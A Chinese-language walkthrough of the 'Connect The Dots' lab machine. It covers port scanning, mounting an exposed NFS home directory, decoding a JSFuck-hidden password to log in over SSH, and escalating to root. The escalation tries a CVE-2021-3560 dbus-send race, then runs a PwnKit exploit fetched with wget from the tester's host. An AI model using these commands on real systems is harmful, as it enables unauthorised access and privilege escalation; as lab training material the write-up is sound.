Connect The Dots

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.112            
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-12 09:34 EDT
Nmap scan report for 192.168.56.112
Host is up (0.000085s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
7822/tcp  open  unknown
33547/tcp open  unknown
34175/tcp open  unknown
40731/tcp open  unknown
44757/tcp open  unknown
MAC Address: 08:00:27:33:4B:05 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p21,80,111,2049,7822 192.168.56.112
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-12 09:36 EDT
Nmap scan report for 192.168.56.112
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
111/tcp  open  rpcbind 2-4 (RPC #100000)
2049/tcp open  nfs_acl 3 (RPC #100227)
7822/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 08:00:27:33:4B:05 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.112              
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-12 09:37 EDT
Nmap scan report for 192.168.56.112
Host is up (0.00030s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:33:4B:05 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.62 seconds

nmap自带脚本的漏洞扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p21,80,111,2049,7822 192.168.56.112
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-12 09:40 EDT
Nmap scan report for 192.168.56.112
Host is up (0.00020s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
| http-fileupload-exploiter: 
|   
|     Couldn\'t find a file-type field.
|   
|     Couldn\'t find a file-type field.
|   
|_    Couldn\'t find a file-type field.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.112:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.56.112:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http-enum: 
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /manual/: Potentially interesting folder
111/tcp  open  rpcbind
2049/tcp open  nfs
7822/tcp open  unknown
MAC Address: 08:00:27:33:4B:05 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.11 seconds

信息比较杂乱，这里汇总一下,开放的端口有：21 ftp、80 http、111 rpcbind、2049 nfs、7822 ssh，一些临时动态端口（五位数的），可能开放的有价值的端口有：69 tftp、445 smb。顺便试错，看看 tftp 到底开放了没有，直接去连接

nfs 渗透

首先 showmount 看看有哪些挂载点，然后在 tmp 文件夹中创建新文件夹，挂载到本机

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.112  
Export list for 192.168.56.112:
/home/morris *

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/infosec                                         

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.112:/home/morris /tmp/infosec      
[sudo] password for kali: 

┌──(kali㉿kali)-[~]
└─$ cd /tmp/infosec

查看挂载点中有哪些文件

┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls -liah
total 56K
 131648 drwxr-xr-x  8 kali kali 4.0K Oct 11  2019 .
4194305 drwxrwxrwt 16 root root 4.0K Jun 12 08:59 ..
 179003 -rw-------  1 kali kali    1 Oct 11  2019 .bash_history
 134179 -rw-r--r--  1 kali kali  220 Oct 10  2019 .bash_logout
 134178 -rw-r--r--  1 kali kali 3.5K Oct 10  2019 .bashrc
 179000 drwx------  9 kali kali 4.0K Oct 10  2019 .cache
 179011 drwx------ 10 kali kali 4.0K Oct 11  2019 .config
 178998 drwx------  3 kali kali 4.0K Oct 10  2019 .gnupg
 179012 -rw-------  1 kali kali 1.9K Oct 11  2019 .ICEauthority
 179032 drwx------  3 kali kali 4.0K Oct 10  2019 .local
 134182 -rw-r--r--  1 kali kali  807 Oct 10  2019 .profile
 179139 drwx------  2 kali kali 4.0K Oct 10  2019 .ssh
 179081 drwxr-xr-x  2 kali kali 4.0K Oct 10  2019 Templates

bash_history 虽然重要，但是这里文件大小显示出其并没有那么大的价值，首先看看.ssh 目录下有哪些东西

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cd .ssh 

┌──(kali㉿kali)-[/tmp/infosec/.ssh]
└─$ ls -liah
total 16K
179139 drwx------ 2 kali kali 4.0K Oct 10  2019 .
131648 drwxr-xr-x 8 kali kali 4.0K Oct 11  2019 ..
178994 -rw------- 1 kali kali 1.8K Oct 11  2019 id_rsa
179004 -rw-r--r-- 1 kali kali  395 Oct 11  2019 id_rsa.pub

查看公钥内容，得到了用户名和主机名，接下来尝试把私钥拷贝到本机，尝试用私钥看看能不能直接登录

┌──(kali㉿kali)-[/tmp/infosec/.ssh]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuTwJDj/B/FtGRkTEiwpoq52/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8lMf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDayumfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t92KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9Nf morris@sirrom
 

尝试用私钥登录，另外信息搜集的结果中 22 端口并没有开放，7822 端口对应 ssh 服务

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ ssh -i id_rsa morris@192.168.56.112 -p 7822
morris@192.168.56.112's password:

显示需要密码，那就只能暂时搁置，接着考虑如何获取到密码

ftp 渗透

尝试 ftp 匿名登录，另外刚才查看公钥得到了一个新的用户名，都可以试一试

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ ftp 192.168.56.112
Connected to 192.168.56.112.
220 Welcome to Heaven!
Name (192.168.56.112:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ ftp 192.168.56.112
Connected to 192.168.56.112.
220 Welcome to Heaven!
Name (192.168.56.112:kali): morris
530 Permission denied.
ftp: Login failed
ftp> exit
221 Goodbye.

都失败了，有点郁闷，还有个 tftp 尝试

┌──(kali㉿kali)-[~]
└─$ tftp 192.168.56.112
tftp> ls
?Invalid command
tftp> 
tftp> ?
Commands may be abbreviated.  Commands are:

connect         connect to remote tftp
mode            set file transfer mode
put             send file
get             receive file
quit            exit tftp
verbose         toggle verbose mode
trace           toggle packet tracing
status          show current status
binary          set mode to octet
ascii           set mode to netascii
rexmt           set per-packet retransmission timeout
timeout         set total retransmission timeout
?               print help information
tftp> status
Connected to 192.168.56.112.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds

连接成功了，但是 tfpt 无法列出文件列表，先暂时搁置。之后我又反复翻了翻 nfs 挂载中的各个文件夹，能确定的是这台靶机的桌面服务可能用的是 gnome，还有 gpg 软件，另外有一些 db 文件，但是没什么有价值的信息，似乎是访问信息的汇总（网站记录了多个访问信息）。到这里得到的有价值的信息仅限于一个用户名 morris，看一看 Web 服务吧

Web 渗透

index 界面加载了很久

首先看看内容，大意是姐弟的名字只差了 M 和 N，剩余部分是完全一致的，那我们又得到了一个用户名norris，再就是这个网站中有一些备份，以及一些挑战游戏

看了看网页源代码，没有什么隐藏信息，上面的按钮指向 index.htm 也就是此界面。目录爆破一下吧

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.112 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 -x txt,zip,sql,rar,php,htm 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.112
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              rar,php,htm,txt,zip,sql
[+] Timeout:                 10s
===============================================================
2023/06/12 09:44:29 Starting gobuster in directory enumeration mode
===============================================================
/index.htm            (Status: 200) [Size: 2186]
/.htm                 (Status: 403) [Size: 293]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.112/images/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.112/manual/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.112/javascript/]
/hits.txt             (Status: 200) [Size: 44]
/backups              (Status: 200) [Size: 6301]
/mysite               (Status: 301) [Size: 317] [--> http://192.168.56.112/mysite/]
/.htm                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1543646 / 1543927 (99.98%)===============================================================
2023/06/12 09:47:01 Finished
===============================================================

一些值得关注的目录：/images,/manual,/hits.txt,/backups,/mysite 优先看一下 hits.txt，得到以下这样一句话，提醒我们要更强地枚举

Remember! Keep your enumeration game strong!

接下来逐个看看目录下有什么信息

images 目录下有两个图片，也就是刚才主页上看到的图片，把他们下载下来，看看是否有隐写信息，分别使用 file, exiftool, binwalk 来判断是否有隐写信息

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ file game.jpg m.gif
game.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], progressive, precision 8, 712x350, components 3
m.gif:    GIF image data, version 89a, 245 x 245

文件头正常

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ binwalk game.jpg m.gif

Scan Time:     2023-06-12 10:01:48
Target File:   /home/kali/Downloads/connectthedots/game.jpg
MD5 Checksum:  338f994c6e56b436b5db64049e81a5d2
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8


Scan Time:     2023-06-12 10:01:48
Target File:   /home/kali/Downloads/connectthedots/m.gif
MD5 Checksum:  7b76f7dcf7e2569ec2a64de68f850517
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             GIF image data, version "89a", 245 x 245

binwalk 显示没有拼接的信息

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ exiftool game.jpg                                                                                  
ExifTool Version Number         : 12.57
File Name                       : game.jpg
Directory                       : .
File Size                       : 38 kB
File Modification Date/Time     : 2019:10:10 14:08:19-04:00
File Access Date/Time           : 2023:06:12 10:01:09-04:00
File Inode Change Date/Time     : 2023:06:12 10:00:40-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 192
Y Resolution                    : 192
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Image Width                     : 712
Image Height                    : 350
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 712x350
Megapixels                      : 0.249

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ exiftool m.gif   
ExifTool Version Number         : 12.57
File Name                       : m.gif
Directory                       : .
File Size                       : 933 kB
File Modification Date/Time     : 2019:10:10 14:12:14-04:00
File Access Date/Time           : 2023:06:12 10:01:09-04:00
File Inode Change Date/Time     : 2023:06:12 10:00:50-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 245
Image Height                    : 245
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 255
Animation Iterations            : Infinite
XMP Toolkit                     : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Creator Tool                    : Adobe Photoshop CS6 (Macintosh)
Instance ID                     : xmp.iid:085685312E1611E2A32B9E634BBB29DA
Document ID                     : xmp.did:085685322E1611E2A32B9E634BBB29DA
Derived From Instance ID        : xmp.iid:A5C200202E1511E2A32B9E634BBB29DA
Derived From Document ID        : xmp.did:085685302E1611E2A32B9E634BBB29DA
Transparent Color               : 255
Frame Count                     : 25
Duration                        : 2.50 s
Image Size                      : 245x245
Megapixels                      : 0.060

exiftool 显示的结果中也没有有价值的信息，有一丢丢烦躁了。继续查看别的目录吧

backups 给了一个视频，关于这个视频里有没有隐藏信息，其实也需要留心，这里我只留下一个标记，等没头绪的话，再考虑视频信息隐藏的可能性。

manual 是 apache 的手册，简单看了眼，没什么可以利用地方，这种应该是默认的界面，出现漏洞话，应该是 apache 本身有漏洞才有可能，搜了一下 apache 这个版本的漏洞，只有一个提权漏洞，暂时没什么价值

这里是网站目录下的文件，但是有个文件是 cs 后缀和平常文件似乎不一样，保存打开看看

这里并不知道到底是什么奇奇怪怪的语言，直接搜索也没有搜索到，先看了看红队笔记，原来是 JSFuck（，去掉一些无关的字符，然后去在线网站JSFuck - Write any JavaScript with 6 Characters: !+，得到了密码 TryToGuessThisNorris@2k19

尝试用这个密码登录 ssh、ftp，这里要记得我们有两个用户名 morris 和 norris

┌──(kali㉿kali)-[/tmp/infosec/.cache/evolution/tasks]
└─$ ftp 192.168.56.112
Connected to 192.168.56.112.
220 Welcome to Heaven!
Name (192.168.56.112:kali): norris
331 Please specify the password.
Password: 
421 Timeout.
ftp: Login failed
ftp> e
?Ambiguous command.
ftp> exit

┌──(kali㉿kali)-[/tmp/infosec/.cache/evolution/tasks]
└─$ ftp 192.168.56.112                                        
Connected to 192.168.56.112.
220 Welcome to Heaven!
Name (192.168.56.112:kali): norris
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62846|)
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 11  2019 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||27359|)
150 Here comes the directory listing.
-r--------    1 1001     1001         6301 Oct 11  2019 backups.bak
-r--------    1 1001     1001        39610 Oct 11  2019 game.jpg.bak
-r--------    1 1001     1001           29 Oct 11  2019 hits.txt.bak
-r--------    1 1001     1001       932659 Oct 11  2019 m.gif.bak
226 Directory send OK.
ftp> exit
221 Goodbye.

ftp 中得到了一些备份文件，稍后逐个检查，不过看起来是我们之前在查看网页目录结构时看到的信息的备份

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ ssh -i id_rsa morris@192.168.56.112 -p 7822
morris@192.168.56.112\'s password: 
Permission denied, please try again.
morris@192.168.56.112\'s password: 


┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ ssh norris@192.168.56.112 -p 7822  
norris@192.168.56.112\'s password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

Last login: Mon Jun 12 20:03:57 2023 from 192.168.56.106
norris@sirrom:~$ pwd
/home/norris
norris@sirrom:~$ ls
ftp  user.txt

使用刚才的密码，ssh 登录 norris 用户成功，ftp 目录就在当前用户的目录下

提权

查看 suid

norris@sirrom:~$ find / -type f -perm -u=s 2>/dev/null
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/bwrap
/usr/bin/mount
/usr/bin/su
/usr/bin/pkexec
/usr/bin/ntfs-3g
/usr/bin/chsh
/usr/bin/sudo

这里自己尝试了一些漏洞，主要是针对 polkit 的漏洞 Lab Walkthrough - Exploiting PwnKit (CVE-2021–4034) | INE 这篇文章是针对 CVE-2021-4034 的，但是有个问题是靶机中 gcc 无法使用，后续又看到了有使用 CVE-2021-3560 漏洞的 PolKit Privilege Escalation | Exploit Notes (hdks.org)。但是尝试失败了还参考了这篇文章 vulnhub刷题记录（Dripping Blues: 1） - 知乎 (zhihu.com)

它允许非特权用户使用 DBus 调用特权方法，在这个漏洞中我们将调用 accountservice 提供的 2 个特权方法（CreateUser 和 SetPassword），这允许我们创建一个特权用户然后为其设置密码，最后以创建的用户身份登录，然后提升为root。

norris@sirrom:/usr/bin$ time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required

real    0m0.008s
user    0m0.001s
sys     0m0.000s
norris@sirrom:/usr/bin$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.0015s; kill $!
[1] 2990
norris@sirrom:/usr/bin$ id tester
id: ‘tester’: no such user
[1]+  Terminated              dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1
norris@sirrom:/usr/bin$ id tester
id: ‘tester’: no such user

Linux Polkit 权限提升漏洞CVE-2021-4034

后续看了眼红队笔记，给的提权思路很好，但是强经验相关，因此自己又找了别的 exp：(4条消息) Linux Polkit 权限提升漏洞CVE-2021-4034_灬半醉半醒半痴呆つ的博客-CSDN博客 其中提到了一个脚本 https://github.com/dzonerzy/poc-cve-2021-4034 。将其下载到本地，然后靶机访问本机的 http 服务按照脚本里的内容，将文件下载到 tmp 目录下，然后直接运行就可以

norris@sirrom:/tmp$ wget http://192.168.56.106:8088/exploit -O exploit
--2023-06-13 06:30:13--  http://192.168.56.106:8088/exploit
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4442423 (4.2M) [application/octet-stream]
Saving to: ‘exploit’

exploit                      100%[==============================================>]   4.24M  --.-KB/s    in 0.03s   

2023-06-13 06:30:13 (123 MB/s) - ‘exploit’ saved [4442423/4442423]

norris@sirrom:/tmp$ ls
exploit
norris@sirrom:/tmp$ chmod +x exploit 
norris@sirrom:/tmp$ ./exploit 
2023/06/13 06:30:28 CMDTOEXECUTE is empty fallback to default value
2023/06/13 06:30:28 Executing command sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(norris)
# cat /root/root.txt
8fc9376d961670ca10be270d52eda423

补充思路

横向用户切换

ftp 中有一些bak文件，但是之前没有仔细查看，这里仔细对文件进行检查

┌──(kali㉿kali)-[~/Downloads/connectthedots]
└─$ exiftool *.bak                                                                                     
======== backups.bak
ExifTool Version Number         : 12.57
File Name                       : backups.bak
Directory                       : .
File Size                       : 6.3 kB
File Modification Date/Time     : 2019:10:10 22:47:30-04:00
File Access Date/Time           : 2023:06:12 10:26:39-04:00
File Inode Change Date/Time     : 2023:06:12 10:26:39-04:00
File Permissions                : -rw-r--r--
File Type                       : MP4
File Type Extension             : mp4
MIME Type                       : video/mp4
Major Brand                     : Unknown (mp4v)
Minor Version                   : 0.0.0
Compatible Brands               : mp4v, mp42, isom
Movie Header Version            : 0
Create Date                     : 0000:00:00 00:00:00
Modify Date                     : 0000:00:00 00:00:00
Time Scale                      : 2285
Duration                        : 3.06 s
Preferred Rate                  : 1
Preferred Volume                : 100.00%
Preview Time                    : 0 s
Preview Duration                : 0 s
Poster Time                     : 0 s
Selection Time                  : 0 s
Selection Duration              : 0 s
Current Time                    : 0 s
Next Track ID                   : 2
Track Header Version            : 0
Track Create Date               : 0000:00:00 00:00:00
Track Modify Date               : 0000:00:00 00:00:00
Track ID                        : 1
Track Duration                  : 3.06 s
Track Layer                     : 0
Track Volume                    : 100.00%
Matrix Structure                : 1 0 0 0 1 0 0 0 1
Image Width                     : 224
Image Height                    : 224
Media Header Version            : 0
Media Create Date               : 0000:00:00 00:00:00
Media Modify Date               : 0000:00:00 00:00:00
Media Time Scale                : 2285
Media Duration                  : 3.06 s
Media Language Code             : und
Handler Type                    : Video Track
Graphics Mode                   : srcCopy
Op Color                        : 0 0 0
Compressor ID                   : avc1
Source Image Width              : 224
Source Image Height             : 224
X Resolution                    : 72
Y Resolution                    : 72
Bit Depth                       : 24
Video Frame Rate                : 2.285
Media Data Size                 : 5584
Media Data Offset               : 717
Image Size                      : 224x224
Megapixels                      : 0.050
Avg Bitrate                     : 14.6 kbps
Rotation                        : 0
======== game.jpg.bak
ExifTool Version Number         : 12.57
File Name                       : game.jpg.bak
Directory                       : .
File Size                       : 40 kB
File Modification Date/Time     : 2019:10:10 22:16:38-04:00
File Access Date/Time           : 2023:06:12 10:27:16-04:00
File Inode Change Date/Time     : 2023:06:12 10:27:16-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 192
Y Resolution                    : 192
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Comment                         : .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
Image Width                     : 712
Image Height                    : 350
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 712x350
Megapixels                      : 0.249
======== hits.txt.bak
ExifTool Version Number         : 12.57
File Name                       : hits.txt.bak
Directory                       : .
File Size                       : 29 bytes
File Modification Date/Time     : 2019:10:10 22:26:23-04:00
File Access Date/Time           : 2023:06:12 10:27:22-04:00
File Inode Change Date/Time     : 2023:06:12 10:27:22-04:00
File Permissions                : -rw-r--r--
File Type                       : TXT
File Type Extension             : txt
MIME Type                       : text/plain
MIME Encoding                   : us-ascii
Newlines                        : (none)
Line Count                      : 1
Word Count                      : 1
======== m.gif.bak
ExifTool Version Number         : 12.57
File Name                       : m.gif.bak
Directory                       : .
File Size                       : 933 kB
File Modification Date/Time     : 2019:10:10 21:43:29-04:00
File Access Date/Time           : 2023:06:12 10:27:27-04:00
File Inode Change Date/Time     : 2023:06:12 10:27:27-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
